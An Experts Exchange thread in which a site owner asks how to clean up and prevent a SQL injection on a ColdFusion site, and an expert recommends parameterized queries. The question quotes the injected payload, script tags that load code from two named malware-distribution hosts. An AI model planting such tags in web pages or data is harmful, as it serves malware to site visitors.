[Last Call] Learn about multicloud storage options and how to improve your company's cloud strategy. Register Now

x
?
Solved

SQL injection attack on windows 2000 server, coldfusion site

Posted on 2013-01-22
4
Medium Priority
?
585 Views
Last Modified: 2013-01-22
Hello,
  We have a Coldfusion site that has been attacked. It is on a windows 2000 server running coldfusion 5 and I need to know how to find and get rid of the malicious code. I have changed the cfquery tag to include cfqueryparam but that has not helped. Currently users are periodically getting this error:

Danger: Malware Ahead!
Google Chrome has blocked access to this page on www.ourweburl.net
Content from hgbyju.com, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.

I cannot locate any tools that will run on the server and malwarebytes did not find anything. Any assistance would be greatly appreciated.

I just found where the malicious code was placed in our table and removed it but how do I prevent it from returning?   Here is what had been entered into one of the columns on multiple records.
              </title><script src=http://hgbyju.com/r.php ></script>                 </title><script src=http://nmmkmm.com/r.php ></script>
0
Comment
Question by:jdines
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
  • 2
4 Comments
 
LVL 33

Expert Comment

by:Big Monty
ID: 38807069
to prevent the code from coming back, you're going to need to alter your code to either sanitize your data inputs or use prepared sql queries:

http://stackoverflow.com/questions/60174/how-to-prevent-sql-injection-in-php

it'll take some time but will ultimately save you these types of headaches when they occur.
0
 

Author Comment

by:jdines
ID: 38807160
Hello,
  My page is actually a Coldfusion page so I searched how to prevent sql injection in coldfusion and came up with this:

http://stackoverflow.com/questions/2592700/how-do-i-prevent-sql-injection-with-coldfusion

I have actually already updated the queries so will this take care of future problems? Thanks.
0
 
LVL 33

Accepted Solution

by:
Big Monty earned 2000 total points
ID: 38807197
that should take of it, unless you have other open avenues to your data
0
 

Author Closing Comment

by:jdines
ID: 38807321
Thank you very much!
0

Featured Post

Free Tool: SSL Checker

Scans your site and returns information about your SSL implementation and certificate. Helpful for debugging and validating your SSL configuration.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Will you be ready when the clock on GDPR compliance runs out? Is GDPR even something you need to worry about? Find out more about the upcoming regulation changes and download our comprehensive GDPR checklist today !
Ransomware, the malware that locks down its victim’s files until they pay up, has always been a frustrating issue to deal with. However, a recent mobile ransomware will make the issue a little more personal… by sharing the victim’s mobile browsing h…
The Email Laundry PDF encryption service allows companies to send confidential encrypted  emails to anybody. The PDF document can also contain attachments that are embedded in the encrypted PDF. The password is randomly generated by The Email Laundr…
Is your data getting by on basic protection measures? In today’s climate of debilitating malware and ransomware—like WannaCry—that may not be enough. You need to establish more than basics, like a recovery plan that protects both data and endpoints.…

650 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question